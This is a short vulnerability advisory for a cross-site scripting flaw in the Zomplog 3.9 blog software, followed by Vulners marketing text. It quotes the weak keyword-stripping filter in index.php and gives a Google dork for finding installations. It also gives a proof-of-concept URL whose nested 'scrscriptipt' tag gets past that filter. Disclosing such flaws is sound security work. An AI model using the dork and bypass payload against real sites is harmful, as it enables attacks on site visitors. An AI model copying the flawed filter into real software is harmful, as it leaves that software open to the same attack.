=============================
Zomplog 3.9 XSS Vulnerability
=============================
############################################################################
#Title: Zomplog 3.9 XSS
#Vendor: http://www.zomp.nl
#Dork: "Powered by Zomplog"
############################################################################
#AUTHOR: ITSecTeam
#Email: [email protected]
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Original Advisory:
http://itsecteam.com/en/vulnerabilities/vulnerability42.htm
#Thanks: r3dm0v3, Pejvak, [email protected]
############################################################################
#DESCRIPTION (by vendor):###################################################
There are many great weblog systems around, but they all require technical
knowledge from their users. Zomplog is different: it let's you focus on
content instead of code.
#BUG:#######################################################################
file index.php
10: // some general xxs protection
11: $_GET['search'] = str_replace('script', '', $_GET['search']);
12: $_GET['username'] = str_replace('script', '', $_GET['username']);
Code just removes script keyword that leaves file vulnerable to xss.
#POC:#######################################################################
http://www.site.com/index.php?search="><scrscriptipt>alert(1)</scrscriptipt>\
# 0day.today [2018-02-15] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation